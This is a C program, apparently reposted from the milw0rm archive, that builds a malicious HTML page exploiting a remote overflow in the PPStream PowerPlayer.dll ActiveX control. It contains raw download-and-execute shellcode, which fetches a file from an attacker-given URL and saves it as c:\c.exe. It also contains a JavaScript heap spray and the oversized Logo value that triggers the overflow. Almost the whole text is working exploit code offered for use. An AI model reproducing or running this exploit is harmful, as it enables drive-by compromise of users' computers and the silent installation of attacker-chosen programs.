PPStream (PowerPlayer.dll 2.0.1.3829) Activex Remote Overflow Exploit
来源:milw0rm
// author: dummy
// written by [email protected] (2007)
#define _CRT_SECURE_NO_DEPRECATE
#include <windows.h>
#include <stdio.h>
const unsigned char shellcode[174] =
{
0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A,
0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00, 0x00, 0x36, 0x1A, 0x2F,
0x70, 0x63, 0x3A, 0x5C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x59, 0x5F, 0xAF, 0x67, 0x64, 0xA1,
0x30, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x70, 0x1C, 0xAD, 0x8B, 0x68, 0x08, 0x51, 0x8B, 0x75, 0x3C,
0x8B, 0x74, 0x2E, 0x78, 0x03, 0xF5, 0x56, 0x8B, 0x76, 0x20, 0x03, 0xF5, 0x33, 0xC9, 0x49, 0x41,
0xAD, 0x03, 0xC5, 0x33, 0xDB, 0x0F, 0xBE, 0x10, 0x38, 0xF2, 0x74, 0x08, 0xC1, 0xCB, 0x0D, 0x03,
0xDA, 0x40, 0xEB, 0xF1, 0x3B, 0x1F, 0x75, 0xE7, 0x5E, 0x8B, 0x5E, 0x24, 0x03, 0xDD, 0x66, 0x8B,
0x0C, 0x4B, 0x8B, 0x5E, 0x1C, 0x03, 0xDD, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0xAB, 0x59, 0xE2, 0xBC,
0x8B, 0x0F, 0x80, 0xF9, 0x63, 0x74, 0x0A, 0x57, 0xFF, 0xD0, 0x95, 0xAF, 0xAF, 0x6A, 0x01, 0xEB,
0xAC, 0x52, 0x52, 0x57, 0x8D, 0x8F, 0xDB, 0x10, 0x40, 0x00, 0x81, 0xE9, 0x4E, 0x10, 0x40, 0x00,
0x51, 0x52, 0xFF, 0xD0, 0x6A, 0x01, 0x57, 0xFF, 0x57, 0xEC, 0xFF, 0x57, 0xE8, 0x90
};
const char* script1 = \
"<html><body><object id=\"ppc\" classid=\"clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458\"></object><script>"
"var shellcode = unescape(\"";
const char* script2 = \
"\");"
"bigblock = unescape(\"%u9090\");"
"headersize = 20;"
"slackspace = headersize + shellcode.length;"
"while ( bigblock.length < slackspace ) bigblock += bigblock;"
"fillblock = bigblock.substring(0, slackspace);"
"block = bigblock.substring(0, bigblock.length - slackspace);"
"while(block.length + slackspace < 0x40000) block = block + block + fillblock;"
"memory = new Array();"
"for (x=0; x< 400; x++) memory[x] = block + shellcode;"
"var buffer = '\\x0a';"
"while (buffer.length < 500) buffer += '\\x0a\\x0a\\x0a\\x0a';"
"ppc.Logo = buffer;"
"</script>"
"</body>"
"</html>";
int main(int argc, char* argv[])
{
if ( argc != 2 )
{
printf("ex:fuckpps url\nwritten by [email protected] (2007)\n");
return -1;
}
FILE *file = fopen("fuckpps.html", "w+");
if ( file == NULL )
{
printf("create 'fuckpps.html' failed!\n");
return -2;
}
fprintf(file, "%s", script1);
for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )
fprintf(file, "%%u%02X%02X" , shellcode[i + 1], shellcode[i]);
const unsigned l = strlen(argv[1]);
for ( unsigned j = 0; j < l; j += 2 )
fprintf(file, "%%u%02X%02X" , argv[1][j + 1], argv[1][j]);
fprintf(file, "%s", script2);
fclose(file);
printf("make 'fuckpps.html' successed!\n");
return 0;
}